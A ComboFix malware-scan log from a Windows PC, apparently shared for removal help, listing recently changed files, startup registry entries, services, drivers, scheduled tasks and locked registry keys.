2015-01-23 17:35 . 2015-01-23 17:35 -------- d-----w- C:\_OTL
2015-01-23 01:49 . 2015-01-24 05:17 -------- d-----w- C:\AdwCleaner
2015-01-23 01:00 . 2015-01-24 01:49 -------- d-----w- C:\FRST
2015-01-22 05:05 . 2015-01-22 05:05 -------- d-----w- c:\users\Tom Jones\.jmc
2015-01-22 04:50 . 2015-01-23 02:10 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2015-01-22 03:33 . 2015-01-22 16:23 37624 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2015-01-22 03:33 . 2015-01-22 03:33 -------- d-----w- c:\programdata\RogueKiller
2015-01-22 02:54 . 2014-09-17 01:56 1188440 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{14144F4D-F194-4E37-A55E-30624807F987}\gapaengine.dll
2014-12-27 18:56 . 2015-01-24 17:23 -------- d-----w- c:\users\Tom%20Jones
2014-12-27 03:56 . 2014-12-27 03:57 -------- d-----w- c:\users\Tom Jones\.gradle
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-01-25 07:22 . 2014-07-01 05:35 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-01-25 01:11 . 2014-02-22 18:06 111016 ----a-w- c:\windows\system32\WindowsAccessBridge-64.dll
2015-01-25 01:11 . 2014-02-22 18:06 319912 ----a-w- c:\windows\system32\javaws.exe
2015-01-25 01:11 . 2014-02-22 18:06 191400 ----a-w- c:\windows\system32\javaw.exe
2015-01-25 01:11 . 2014-02-22 18:06 190888 ----a-w- c:\windows\system32\java.exe
2015-01-25 01:11 . 2014-10-21 02:28 98216 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
2015-01-23 02:11 . 2014-07-01 05:35 97496 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2015-01-23 01:55 . 2014-05-05 05:51 701616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2015-01-23 01:55 . 2012-07-03 18:41 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-12-31 11:14 . 2010-11-21 03:27 298120 ------w- c:\windows\system32\MpSigStub.exe
2014-12-13 05:09 . 2014-12-18 15:28 144384 ----a-w- c:\windows\system32\ieUnatt.exe
2014-12-13 03:33 . 2014-12-18 15:28 115712 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-11-27 01:43 . 2014-12-10 01:43 389296 ----a-w- c:\windows\system32\iedkcs32.dll
2014-11-22 03:13 . 2014-12-10 01:43 25059840 ----a-w- c:\windows\system32\mshtml.dll
2014-11-22 03:06 . 2014-12-10 01:43 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-11-22 03:06 . 2014-12-10 01:43 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-11-22 02:50 . 2014-12-10 01:43 66560 ----a-w- c:\windows\system32\iesetup.dll
2014-11-22 02:50 . 2014-12-10 01:43 580096 ----a-w- c:\windows\system32\vbscript.dll
2014-11-22 02:49 . 2014-12-10 01:43 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-11-22 02:49 . 2014-12-10 01:43 2885120 ----a-w- c:\windows\system32\iertutil.dll
2014-11-22 02:48 . 2014-12-10 01:43 88064 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-11-22 02:41 . 2014-12-10 01:43 54784 ----a-w- c:\windows\system32\jsproxy.dll
2014-11-22 02:40 . 2014-12-10 01:43 34304 ----a-w- c:\windows\system32\iernonce.dll
2014-11-22 02:37 . 2014-12-10 01:43 633856 ----a-w- c:\windows\system32\ieui.dll
2014-11-22 02:35 . 2014-12-10 01:43 114688 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-11-22 02:34 . 2014-12-10 01:43 814080 ----a-w- c:\windows\system32\jscript9diag.dll
2014-11-22 02:34 . 2014-12-10 01:43 6039552 ----a-w- c:\windows\system32\jscript9.dll
2014-11-22 02:26 . 2014-12-10 01:43 968704 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-11-22 02:22 . 2014-12-10 01:43 490496 ----a-w- c:\windows\system32\dxtmsft.dll
2014-11-22 02:20 . 2014-12-10 01:43 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-11-22 02:14 . 2014-12-10 01:43 77824 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-11-22 02:09 . 2014-12-10 01:43 199680 ----a-w- c:\windows\system32\msrating.dll
2014-11-22 02:08 . 2014-12-10 01:43 92160 ----a-w- c:\windows\system32\mshtmled.dll
2014-11-22 02:07 . 2014-12-10 01:43 501248 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-11-22 02:07 . 2014-12-10 01:43 62464 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-11-22 02:06 . 2014-12-10 01:43 47616 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05 . 2014-12-10 01:43 64000 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-11-22 02:05 . 2014-12-10 01:43 316928 ----a-w- c:\windows\system32\dxtrans.dll
2014-11-22 01:54 . 2014-12-10 01:43 620032 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-11-22 01:49 . 2014-12-10 01:43 718848 ----a-w- c:\windows\system32\ie4uinit.exe
2014-11-22 01:49 . 2014-12-10 01:43 800768 ----a-w- c:\windows\system32\msfeeds.dll
2014-11-22 01:47 . 2014-12-10 01:43 1359360 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-11-22 01:46 . 2014-12-10 01:43 2125312 ----a-w- c:\windows\system32\inetcpl.cpl
2014-11-22 01:43 . 2014-12-10 01:43 14412800 ----a-w- c:\windows\system32\ieframe.dll
2014-11-22 01:40 . 2014-12-10 01:43 60416 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29 . 2014-12-10 01:43 4299264 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-11-22 01:28 . 2014-12-10 01:43 2358272 ----a-w- c:\windows\system32\wininet.dll
2014-11-22 01:22 . 2014-12-10 01:43 2052096 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-11-22 01:21 . 2014-12-10 01:43 1155072 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:15 . 2014-12-10 01:43 1548288 ----a-w- c:\windows\system32\urlmon.dll
2014-11-22 01:03 . 2014-12-10 01:43 800768 ----a-w- c:\windows\system32\ieapfltr.dll
2014-11-22 01:00 . 2014-12-10 01:43 1888256 ----a-w- c:\windows\SysWow64\wininet.dll
2014-11-21 11:14 . 2014-07-01 05:35 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-11-21 11:14 . 2012-06-09 21:16 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-11-18 20:02 . 2014-12-26 04:58 84992 ----a-w- c:\windows\system32\drivers\IntelHaxm.sys
2014-11-11 03:09 . 2014-12-10 01:42 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-11-11 03:08 . 2014-11-19 14:36 241152 ----a-w- c:\windows\system32\pku2u.dll
2014-11-11 03:08 . 2014-11-19 14:36 728064 ----a-w- c:\windows\system32\kerberos.dll
2014-11-11 02:44 . 2014-12-10 01:42 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44 . 2014-11-19 14:36 186880 ----a-w- c:\windows\SysWow64\pku2u.dll
2014-11-11 02:44 . 2014-11-19 14:36 550912 ----a-w- c:\windows\SysWow64\kerberos.dll
2014-11-11 01:46 . 2014-12-10 01:42 119296 ----a-w- c:\windows\system32\drivers\tdx.sys
2014-11-08 03:16 . 2014-12-10 01:42 2048 ----a-w- c:\windows\system32\tzres.dll
2014-11-08 02:45 . 2014-12-10 01:42 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2014-10-30 02:03 . 2014-12-10 01:42 165888 ----a-w- c:\windows\system32\charmap.exe
2014-10-30 01:45 . 2014-12-10 01:42 155136 ----a-w- c:\windows\SysWow64\charmap.exe
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"F.lux"="c:\users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe" [2013-10-23 1017224]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Logitech G35"="c:\program files (x86)\Logitech\G35\G35.exe" [2010-10-05 1811800]
"JMB36X IDE Setup"="c:\windows\RaidTool\xInsIDE.exe" [2010-01-19 43632]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-11-20 1021128]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
NETGEAR WPN111 Smart Wizard.lnk - c:\program files (x86)\NETGEAR\WPN111\wpn111.exe [2012-3-24 995328]
SetPointII.lnk - c:\program files\Logitech\SetPoint II\SetPointII.exe [2009-7-21 815104]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
"SoftwareSASGeneration"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux9"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk *\0\0sdnclean64.exe
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;e:\program files\Skype\Updater\Updater.exe;e:\program files\Skype\Updater\Updater.exe [x]
R3 acsock;acsock;c:\windows\system32\DRIVERS\acsock64.sys;c:\windows\SYSNATIVE\DRIVERS\acsock64.sys [x]
R3 ALSysIO;ALSysIO;c:\users\TomSP~1\AppData\Local\Temp\ALSysIO64.sys;c:\users\TomSP~1\AppData\Local\Temp\ALSysIO64.sys [x]
R3 c2wts;Claims to Windows Token Service;c:\program files\Windows Identity Foundation\v3.5\c2wtshost.exe;c:\program files\Windows Identity Foundation\v3.5\c2wtshost.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
R3 MotioninJoyXFilter;MotioninJoy Virtual Xinput device Filter Driver;c:\windows\system32\DRIVERS\MijXfilt.sys;c:\windows\SYSNATIVE\DRIVERS\MijXfilt.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 PCAMp50a64;PCAMp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCAMp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCAMp50a64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 rspCrash;rspCrash;c:\windows\system32\DRIVERS\rspCrash64.sys;c:\windows\SYSNATIVE\DRIVERS\rspCrash64.sys [x]
R3 s1018bus;Sony Ericsson Device 1018 driver (WDM);c:\windows\system32\DRIVERS\s1018bus.sys;c:\windows\SYSNATIVE\DRIVERS\s1018bus.sys [x]
R3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;c:\windows\system32\DRIVERS\s1018mdfl.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mdfl.sys [x]
R3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;c:\windows\system32\DRIVERS\s1018mdm.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mdm.sys [x]
R3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);c:\windows\system32\DRIVERS\s1018mgmt.sys;c:\windows\SYSNATIVE\DRIVERS\s1018mgmt.sys [x]
R3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);c:\windows\system32\DRIVERS\s1018nd5.sys;c:\windows\SYSNATIVE\DRIVERS\s1018nd5.sys [x]
R3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;c:\windows\system32\DRIVERS\s1018obex.sys;c:\windows\SYSNATIVE\DRIVERS\s1018obex.sys [x]
R3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);c:\windows\system32\DRIVERS\s1018unic.sys;c:\windows\SYSNATIVE\DRIVERS\s1018unic.sys [x]
R3 SaiK0836;SaiK0836;c:\windows\system32\DRIVERS\SaiK0836.sys;c:\windows\SYSNATIVE\DRIVERS\SaiK0836.sys [x]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys;c:\windows\SYSNATIVE\drivers\synth3dvsc.sys [x]
R3 Te.Service;Te.Service;c:\program files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe;c:\program files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [x]
R3 terminpt;Microsoft Remote Desktop Input Driver;c:\windows\system32\drivers\terminpt.sys;c:\windows\SYSNATIVE\drivers\terminpt.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys;c:\windows\SYSNATIVE\drivers\tsusbhub.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VBoxUSB;VirtualBox USB;c:\windows\system32\Drivers\VBoxUSB.sys;c:\windows\SYSNATIVE\Drivers\VBoxUSB.sys [x]
R3 VsEtwService120;Visual Studio ETW Event Collection Service;c:\program files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe;c:\program files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [x]
R4 RsFx0103;RsFx0103 Driver;c:\windows\system32\DRIVERS\RsFx0103.sys;c:\windows\SYSNATIVE\DRIVERS\RsFx0103.sys [x]
R4 SQLAgent$SQLEXPRESS;SQL Server Agent (SQLEXPRESS);c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE;c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [x]
S0 mv91xx;mv91xx;c:\windows\system32\DRIVERS\mv91xx.sys;c:\windows\SYSNATIVE\DRIVERS\mv91xx.sys [x]
S1 VBoxDrv;VirtualBox Service;c:\windows\system32\DRIVERS\VBoxDrv.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxDrv.sys [x]
S1 VBoxUSBMon;VirtualBox USB Monitor Driver;c:\windows\system32\DRIVERS\VBoxUSBMon.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxUSBMon.sys [x]
S2 asComSvc;ASUS Com Service;c:\program files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe;c:\program files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [x]
S2 asHmComSvc;ASUS HM Com Service;c:\program files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe;c:\program files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe [x]
S2 AsSysCtrlService;ASUS System Control Service;c:\program files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe;c:\program files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [x]
S2 cpuz135;cpuz135;c:\windows\system32\drivers\cpuz135_x64.sys;c:\windows\SYSNATIVE\drivers\cpuz135_x64.sys [x]
S2 Intel® PROSet Monitoring Service;Intel® PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe;c:\windows\SYSNATIVE\IProsetMonitor.exe [x]
S2 IntelHaxm;Intel HAXM Service;c:\windows\system32\DRIVERS\IntelHaxm.sys;c:\windows\SYSNATIVE\DRIVERS\IntelHaxm.sys [x]
S2 vpnagent;Cisco AnyConnect Secure Mobility Agent;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe;c:\program files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe [x]
S3 LADF_DHP2;G35 DHP2 Filter Driver;c:\windows\system32\DRIVERS\ladfDHP2amd64.sys;c:\windows\SYSNATIVE\DRIVERS\ladfDHP2amd64.sys [x]
S3 LADF_SBVM;G35 SBVM Filter Driver;c:\windows\system32\DRIVERS\ladfSBVMamd64.sys;c:\windows\SYSNATIVE\DRIVERS\ladfSBVMamd64.sys [x]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3hub.sys [x]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\nusb3xhc.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
S3 PCASp50a64;PCASp50a64 NDIS Protocol Driver;c:\windows\system32\Drivers\PCASp50a64.sys;c:\windows\SYSNATIVE\Drivers\PCASp50a64.sys [x]
S3 RTCore64;RTCore64;e:\program files (x86)\MSI Afterburner\RTCore64.sys;e:\program files (x86)\MSI Afterburner\RTCore64.sys [x]
S3 VBoxNetAdp;VirtualBox Host-Only Ethernet Adapter;c:\windows\system32\DRIVERS\VBoxNetAdp.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxNetAdp.sys [x]
S3 VBoxNetFlt;VirtualBox Bridged Networking Service;c:\windows\system32\DRIVERS\VBoxNetFlt.sys;c:\windows\SYSNATIVE\DRIVERS\VBoxNetFlt.sys [x]
S3 WPN111;Wireless USB 2.0 Adapter with RangeMax Service;c:\windows\system32\DRIVERS\WPN111vx.sys;c:\windows\SYSNATIVE\DRIVERS\WPN111vx.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2015-01-25 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
- c:\users\Tom Jones\AppData\Local\Google\Update\GoogleUpdate.exe [2013-02-22 00:41]
.
2015-01-25 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
- c:\users\Tom Jones\AppData\Local\Google\Update\GoogleUpdate.exe [2013-02-22 00:41]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" [2009-06-17 130576]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-04-20 168216]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-04-20 392472]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-04-20 416024]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - e:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: njit.edu\asa1
Trusted Zone: njit.edu\cad
Trusted Zone: njit.edu\webvpn
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\SecuROM\License information*]
"datasecu"=hex:73,2d,ea,2c,61,3f,48,7e,8b,84,1d,e4,99,89,3e,f8,a5,2d,33,63,63,
   ba,e4,f1,c8,f0,39,8e,d3,53,77,fd,48,a5,c6,56,0d,3c,62,4e,3d,b2,a0,b9,be,9f,\
"rkeysecu"=hex:af,66,20,01,21,ab,bc,2d,d8,0f,34,1d,48,48,34,57
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_16_0_0_257_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_16_0_0_257_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_16_0_0_257_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_16_0_0_257_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.16"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_16_0_0_257.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-01-25  19:08:56
ComboFix-quarantined-files.txt  2015-01-26 00:08
ComboFix2.txt  2015-01-24 17:34
.
Pre-Run: 23,863,250,944 bytes free
Post-Run: 23,309,635,584 bytes free
.
- - End Of File - - 2BFE6944F28B8C18809FFED64E90C429
